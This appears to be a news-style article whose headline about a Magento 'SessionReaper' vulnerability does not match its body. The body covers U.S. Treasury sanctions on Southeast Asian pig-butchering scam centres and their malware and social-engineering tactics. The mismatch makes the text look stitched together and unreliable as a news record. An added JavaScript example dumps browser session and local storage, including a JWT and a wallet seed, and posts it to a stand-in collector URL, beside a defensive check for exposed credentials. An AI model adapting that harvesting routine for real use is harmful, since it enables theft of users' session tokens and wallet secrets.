Magento and Adobe SessionReaper Vulnerability Poses Risk of Automated Attacks on Thousands of Online Stores
The U.S. Department of the Treasury has launched an extensive sanctions campaign against a network of cyber scam centres in Southeast Asia that collectively defrauded American victims of over ten billion dollars in 2024. These operations typically posed as legitimate virtual currency investment platforms, using sustained social engineering to build trust first, then persuading victims to wire funds and vanishing with the deposits. The network's activities extended from isolated compounds in Myanmar to casino resorts in Cambodia, where human rights abuses, including forced labour and high-pressure quotas imposed on coerced operators, were rampant. These "pig butchering" scams, which proliferated during the early months of the pandemic, combined romance fraud, approaches made through mobile messaging apps, and fraudulent blockchain tutorials to create a façade of credible returns.
The virtual currency investment websites carried real-time price feeds, valid TLS certificates, and user dashboards that mimicked reputable exchanges, so a padlock icon and live charts gave victims no signal of fraud. Backend malware kits, often installed on the workstations of coerced operators, automated the spoofing of payment notifications and the takeover of social accounts. U.S. Treasury analysts identified code modules that intercepted SMS one-time passcodes and injected synthetic transaction confirmations, allowing scammers to defeat SMS-based two-factor authentication with alarming ease. As these centres expanded, trafficked individuals, some held under threat of debt bondage, were trained to guide callers through scripted dialogues that drew on open-source intelligence for personalised pitches. Victims were also prompted to run benign-looking JavaScript snippets in their browsers to "verify wallet connectivity"; because such a snippet executes with the same privileges as the site's own scripts, it can read whatever session tokens the site keeps in local or session storage and send them to the operators. This is the self-XSS pattern that browsers warn about when unfamiliar code is pasted into the developer console, and it is the reason bearer credentials should not live in web storage at all.
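To make the last point concrete, here is an added example (not code from the Treasury action or from any scam kit) that models what a pasted "verify wallet connectivity" snippet can reach once it runs in the victim's page context, followed by a check a site operator can run to catch credentials that are exposed to exactly this kind of script. The storage objects, key names, origin and collector URL are constructed assumptions, and the transport is injected so the code runs under Node without a browser.

```javascript
// Added illustration of a self-XSS storage dump and a defensive check.
// Nothing here is taken from a real scam kit; all data is constructed.

// Minimal Web Storage lookalike (length/key/getItem) built from a plain object,
// standing in for window.localStorage / window.sessionStorage.
function makeStorage(entries) {
  const keys = Object.keys(entries);
  return {
    get length() { return keys.length; },
    key: (i) => keys[i] ?? null,
    getItem: (k) => (k in entries ? entries[k] : null),
  };
}

// What the scam snippet actually does: walk the storage API exactly as any
// same-origin script may, collecting every key/value pair.
function harvestStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// The "verify wallet connectivity" step. `send` stands in for fetch(); it is
// injected so the example can capture what would have left the browser.
function verifyWalletConnectivity(sessionStorage, localStorage, send, collectUrl) {
  const payload = {
    origin: 'https://exchange.example', // assumed victim site
    session: harvestStorage(sessionStorage),
    local: harvestStorage(localStorage),
  };
  return send(collectUrl, JSON.stringify(payload));
}

// Defensive check for a site's own test suite or CI: flag any storage key whose
// name suggests a bearer credential. Web Storage is readable by every script on
// the origin, so such values belong in an HttpOnly cookie or on the server.
const SECRET_KEY_PATTERN = /token|jwt|session|auth|apikey|seed|mnemonic|private/i;
function findExposedSecrets(storage) {
  return Object.keys(harvestStorage(storage)).filter((k) => SECRET_KEY_PATTERN.test(k));
}

// Constructed sample data resembling a trading dashboard's storage.
const sampleSession = makeStorage({ 'auth.jwt': 'eyJhbGciOi...', 'ui.theme': 'dark' });
const sampleLocal = makeStorage({ 'wallet.seed_backup': 'abandon ... about', 'lastPair': 'BTC/USDT' });

// Capturing transport: records the request instead of sending it anywhere.
function makeRecorder() {
  const sent = [];
  return { sent, send: (url, body) => { sent.push({ url, body }); return { url, body }; } };
}

// Runs the harvest against the sample data and the defensive check beside it.
function demo() {
  const rec = makeRecorder();
  verifyWalletConnectivity(sampleSession, sampleLocal, rec.send, 'https://collector.invalid/v');
  return {
    exfiltrated: JSON.parse(rec.sent[0].body),
    exposed: [...findExposedSecrets(sampleSession), ...findExposedSecrets(sampleLocal)],
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running `demo()` shows the JWT and the seed-phrase backup leaving in a single request, and `findExposedSecrets` names the same two keys. The useful part for a defender is the second function: if it returns anything for your own site, a pasted snippet (or any XSS) already has everything it needs, regardless of how convincing the TLS certificate and dashboard look.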
Categories: Cyber Scams, Human Trafficking, Malware Exploitation
Tags: Sanctions, Cyber Scams, Southeast Asia, Virtual Currency, Social Engineering, Human Rights, Malware, Two-Factor Authentication, Debt Bondage, Command-and-Control